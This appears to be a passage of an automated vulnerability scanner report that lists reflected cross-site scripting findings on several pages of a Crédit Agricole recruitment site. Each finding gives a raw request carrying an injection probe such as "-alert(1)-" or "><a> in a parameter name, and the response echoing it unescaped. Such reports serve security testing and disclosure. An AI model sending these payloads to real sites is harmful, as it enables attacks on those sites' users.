This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /grad_campus_partnerships.php?41565"-alert(1)-"505a6724661=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:33 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:33 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Partner
...[SNIP]...
ent Group";
var SharingBaseTitle = "Partnerships - Campus - Graduates - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/grad_campus_partnerships.php?41565"-alert(1)-"505a6724661=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.73. http://www.mycreditagricole.jobs/grad_campus_partnerships.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /grad_campus_partnerships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e81a"><a>6ddcb53c0b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grad_campus_partnerships.php?6e81a"><a>6ddcb53c0b4=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:09 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:09 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Partner
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/grad_campus_partnerships.php?6e81a"><a>6ddcb53c0b4=1" />
...[SNIP]...

1.74. http://www.mycreditagricole.jobs/grad_key_figures.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /grad_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19d90"-alert(1)-"0dc7d4973a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /grad_key_figures.php?19d90"-alert(1)-"0dc7d4973a2=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:43 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:43 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Key fig
...[SNIP]...
Agricole Recruitment Group";
var SharingBaseTitle = "Key figures - Graduates - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/grad_key_figures.php?19d90"-alert(1)-"0dc7d4973a2=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.75. http://www.mycreditagricole.jobs/grad_key_figures.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /grad_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25e69"><a>bd60c1b6951 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grad_key_figures.php?25e69"><a>bd60c1b6951=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:14 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:14 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Key fig
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/grad_key_figures.php?25e69"><a>bd60c1b6951=1" />
...[SNIP]...

1.76. http://www.mycreditagricole.jobs/grad_video_room.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /grad_video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cfd7"><a>6347bfd3728 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grad_video_room.php?2cfd7"><a>6347bfd3728=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:08 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:08 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/grad_video_room.php?2cfd7"><a>6347bfd3728=1" />
...[SNIP]...

1.77. http://www.mycreditagricole.jobs/grad_video_room.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /grad_video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76e22"-alert(1)-"fe05a195088 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /grad_video_room.php?76e22"-alert(1)-"fe05a195088=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:35 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:35 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
it Agricole Recruitment Group";
var SharingBaseTitle = "Video room - Graduates - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/grad_video_room.php?76e22"-alert(1)-"fe05a195088=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.78. http://www.mycreditagricole.jobs/grad_vie.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /grad_vie.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c3fd"><a>b137c964413 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grad_vie.php?5c3fd"><a>b137c964413=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:10 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:10 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>VIE - G
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/grad_vie.php?5c3fd"><a>b137c964413=1" />
...[SNIP]...

1.79. http://www.mycreditagricole.jobs/grad_vie.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /grad_vie.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13bb3"-alert(1)-"a425af1b629 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /grad_vie.php?13bb3"-alert(1)-"a425af1b629=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:33 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:33 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>VIE - G
...[SNIP]...
duates - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "VIE - Graduates - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/grad_vie.php?13bb3"-alert(1)-"a425af1b629=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.80. http://www.mycreditagricole.jobs/hrpolicy.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1049"><a>72104ee9def was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hrpolicy.php?a1049"><a>72104ee9def=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:36 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:36 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>HR Poli
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/hrpolicy.php?a1049"><a>72104ee9def=1" />
...[SNIP]...

1.81. http://www.mycreditagricole.jobs/hrpolicy.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8b7d"-alert(1)-"1ffd64fe761 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hrpolicy.php?d8b7d"-alert(1)-"1ffd64fe761=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:59 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:59 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 60046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>HR Poli
...[SNIP]...
= "HR Policy - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "HR Policy - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/hrpolicy.php?d8b7d"-alert(1)-"1ffd64fe761=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.82. http://www.mycreditagricole.jobs/hrpolicy_benefit_resp.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_benefit_resp.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1018f"><a>2c05120bb25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hrpolicy_benefit_resp.php?1018f"><a>2c05120bb25=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:44 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:44 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Social
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/hrpolicy_benefit_resp.php?1018f"><a>2c05120bb25=1" />
...[SNIP]...

1.83. http://www.mycreditagricole.jobs/hrpolicy_benefit_resp.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_benefit_resp.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66714"-alert(1)-"aba8f03e0e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hrpolicy_benefit_resp.php?66714"-alert(1)-"aba8f03e0e5=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:10 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:10 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Social
...[SNIP]...
aseTitle = "Social responsibility - Employee benefit programs - HR Policy - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/hrpolicy_benefit_resp.php?66714"-alert(1)-"aba8f03e0e5=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.84. http://www.mycreditagricole.jobs/hrpolicy_career.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_career.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd924"-alert(1)-"fac8db36bea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hrpolicy_career.php?cd924"-alert(1)-"fac8db36bea=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:04 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:04 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Career
...[SNIP]...
ole Recruitment Group";
var SharingBaseTitle = "Career development - HR Policy - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/hrpolicy_career.php?cd924"-alert(1)-"fac8db36bea=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.85. http://www.mycreditagricole.jobs/hrpolicy_career.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_career.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64bbc"><a>e06e8b89cd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hrpolicy_career.php?64bbc"><a>e06e8b89cd4=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:40 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:40 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Career
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/hrpolicy_career.php?64bbc"><a>e06e8b89cd4=1" />
...[SNIP]...

1.86. http://www.mycreditagricole.jobs/hrpolicy_personal.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_personal.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a18ca"><a>d9d791c5f71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /hrpolicy_personal.php?a18ca"><a>d9d791c5f71=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:40 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:40 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Persona
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/hrpolicy_personal.php?a18ca"><a>d9d791c5f71=1" />
...[SNIP]...

1.87. http://www.mycreditagricole.jobs/hrpolicy_personal.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /hrpolicy_personal.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b84fa"-alert(1)-"49fbafa66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hrpolicy_personal.php?b84fa"-alert(1)-"49fbafa66=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:05 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:05 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 59444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Persona
...[SNIP]...
Recruitment Group";
var SharingBaseTitle = "Personal development - HR Policy - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/hrpolicy_personal.php?b84fa"-alert(1)-"49fbafa66=1";
